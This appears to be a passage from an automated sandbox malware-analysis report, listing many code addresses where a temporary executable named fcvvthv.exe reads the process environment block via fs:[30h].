Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7C182 mov eax, dword ptr fs:[00000030h]		3_2_00A7C182
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8A185 mov eax, dword ptr fs:[00000030h]		3_2_00A8A185
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82990 mov eax, dword ptr fs:[00000030h]		3_2_00A82990
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]		3_2_00A5B1E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]		3_2_00A5B1E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]		3_2_00A5B1E1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AE41E8 mov eax, dword ptr fs:[00000030h]		3_2_00AE41E8
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]		3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]		3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]		3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]		3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A74120 mov ecx, dword ptr fs:[00000030h]		3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]		3_2_00A8513A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]		3_2_00A8513A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]		3_2_00A59100
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]		3_2_00A59100
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]		3_2_00A59100
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5C962 mov eax, dword ptr fs:[00000030h]		3_2_00A5C962
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]		3_2_00A5B171
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]		3_2_00A5B171
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]		3_2_00A7B944
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]		3_2_00A7B944
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]		3_2_00A552A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]		3_2_00A552A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]		3_2_00A552A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]		3_2_00A552A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]		3_2_00A552A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]		3_2_00A6AAB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]		3_2_00A6AAB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]		3_2_00A8FAB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]		3_2_00A8D294
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]		3_2_00A8D294
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82AE4 mov eax, dword ptr fs:[00000030h]		3_2_00A82AE4
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82ACB mov eax, dword ptr fs:[00000030h]		3_2_00A82ACB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h]		3_2_00A94A2C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h]		3_2_00A94A2C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]		3_2_00A7A229
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]		3_2_00B1AA16
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]		3_2_00B1AA16
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A68A0A mov eax, dword ptr fs:[00000030h]		3_2_00A68A0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h]		3_2_00A5AA16
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h]		3_2_00A5AA16
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]		3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A55210 mov ecx, dword ptr fs:[00000030h]		3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]		3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]		3_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A73A1C mov eax, dword ptr fs:[00000030h]		3_2_00A73A1C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h]		3_2_00B0B260
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h]		3_2_00B0B260
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B28A62 mov eax, dword ptr fs:[00000030h]		3_2_00B28A62
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A9927A mov eax, dword ptr fs:[00000030h]		3_2_00A9927A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1EA55 mov eax, dword ptr fs:[00000030h]		3_2_00B1EA55
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]		3_2_00A59240
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]		3_2_00A59240
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]		3_2_00A59240
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]		3_2_00A59240
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AE4257 mov eax, dword ptr fs:[00000030h]		3_2_00AE4257
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]		3_2_00A84BAD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]		3_2_00A84BAD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]		3_2_00A84BAD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B25BA5 mov eax, dword ptr fs:[00000030h]		3_2_00B25BA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h]		3_2_00A61B8F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h]		3_2_00A61B8F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B0D380 mov ecx, dword ptr fs:[00000030h]		3_2_00B0D380
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8B390 mov eax, dword ptr fs:[00000030h]		3_2_00A8B390
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1138A mov eax, dword ptr fs:[00000030h]		3_2_00B1138A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82397 mov eax, dword ptr fs:[00000030h]		3_2_00A82397
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]		3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]		3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]		3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]		3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]		3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]		3_2_00A803E2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7DBE9 mov eax, dword ptr fs:[00000030h]		3_2_00A7DBE9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h]		3_2_00AD53CA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h]		3_2_00AD53CA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1131B mov eax, dword ptr fs:[00000030h]		3_2_00B1131B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5DB60 mov ecx, dword ptr fs:[00000030h]		3_2_00A5DB60
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h]		3_2_00A83B7A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h]		3_2_00A83B7A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5DB40 mov eax, dword ptr fs:[00000030h]		3_2_00A5DB40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B28B58 mov eax, dword ptr fs:[00000030h]		3_2_00B28B58
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5F358 mov eax, dword ptr fs:[00000030h]		3_2_00A5F358
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6849B mov eax, dword ptr fs:[00000030h]		3_2_00A6849B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B114FB mov eax, dword ptr fs:[00000030h]		3_2_00B114FB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]		3_2_00AD6CF0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]		3_2_00AD6CF0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]		3_2_00AD6CF0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B28CD6 mov eax, dword ptr fs:[00000030h]		3_2_00B28CD6
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8BC2C mov eax, dword ptr fs:[00000030h]		3_2_00A8BC2C
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]		3_2_00AD6C0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]		3_2_00AD6C0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]		3_2_00AD6C0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]		3_2_00AD6C0A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]		3_2_00B11C06
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]		3_2_00B2740D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]		3_2_00B2740D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]		3_2_00B2740D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7746D mov eax, dword ptr fs:[00000030h]		3_2_00A7746D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8A44B mov eax, dword ptr fs:[00000030h]		3_2_00A8A44B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h]		3_2_00AEC450
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h]		3_2_00AEC450
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A835A1 mov eax, dword ptr fs:[00000030h]		3_2_00A835A1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]		3_2_00A81DB5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]		3_2_00A81DB5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]		3_2_00A81DB5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h]		3_2_00B205AC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h]		3_2_00B205AC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]		3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]		3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]		3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]		3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]		3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]		3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]		3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]		3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]		3_2_00A52D8A
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h]		3_2_00A8FD9B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h]		3_2_00A8FD9B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B08DF1 mov eax, dword ptr fs:[00000030h]		3_2_00B08DF1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]		3_2_00A6D5E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]		3_2_00A6D5E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]		3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]		3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]		3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]		3_2_00B1FDE2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]		3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]		3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]		3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6DC9 mov ecx, dword ptr fs:[00000030h]		3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]		3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]		3_2_00AD6DC9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B28D34 mov eax, dword ptr fs:[00000030h]		3_2_00B28D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1E539 mov eax, dword ptr fs:[00000030h]		3_2_00B1E539
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]		3_2_00A63D34
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]		3_2_00A84D3B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]		3_2_00A84D3B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]		3_2_00A84D3B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5AD30 mov eax, dword ptr fs:[00000030h]		3_2_00A5AD30
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00ADA537 mov eax, dword ptr fs:[00000030h]		3_2_00ADA537
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h]		3_2_00A7C577
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h]		3_2_00A7C577
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A93D43 mov eax, dword ptr fs:[00000030h]		3_2_00A93D43
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD3540 mov eax, dword ptr fs:[00000030h]		3_2_00AD3540
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B03D40 mov eax, dword ptr fs:[00000030h]		3_2_00B03D40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A77D50 mov eax, dword ptr fs:[00000030h]		3_2_00A77D50
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AD46A7 mov eax, dword ptr fs:[00000030h]		3_2_00AD46A7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]		3_2_00B20EA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]		3_2_00B20EA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]		3_2_00B20EA5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00AEFE87 mov eax, dword ptr fs:[00000030h]		3_2_00AEFE87
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A676E2 mov eax, dword ptr fs:[00000030h]		3_2_00A676E2
